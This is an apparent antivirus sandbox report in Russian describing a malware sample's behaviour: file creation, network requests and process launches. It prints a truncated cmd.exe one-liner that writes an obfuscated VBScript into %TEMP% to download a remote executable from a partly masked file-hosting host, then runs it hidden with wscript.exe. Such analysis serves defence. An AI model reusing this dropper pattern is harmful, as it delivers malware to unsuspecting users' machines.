Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "https://www.up##ad.ee/download/11957150/1cb03211f0f017847342/test.exe">>U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\u0k.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://st####.rapidssl.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRhhZrQET0hvbSHUJmNfBKqR%2FiT7wQUU8oXWfxrwAMhLxqu5KqoHIJW2nUCEAffP8uXPz%2BbuVistZM%2BMKI%3D
- http://cd#.##pidssl.com/RapidSSLRSACA2018.crl
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
UDP
- DNS ASK up##ad.ee
- DNS ASK st####.rapidssl.com
- DNS ASK cd#.##pidssl.com
- DNS ASK oc##.#tartssl.com
- DNS ASK oc##.thawte.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\U0k.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "https://www.up##ad.ee/download/11957150/1cb03211f0f017847342/test.exe">>U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"...' (со скрытым окном)
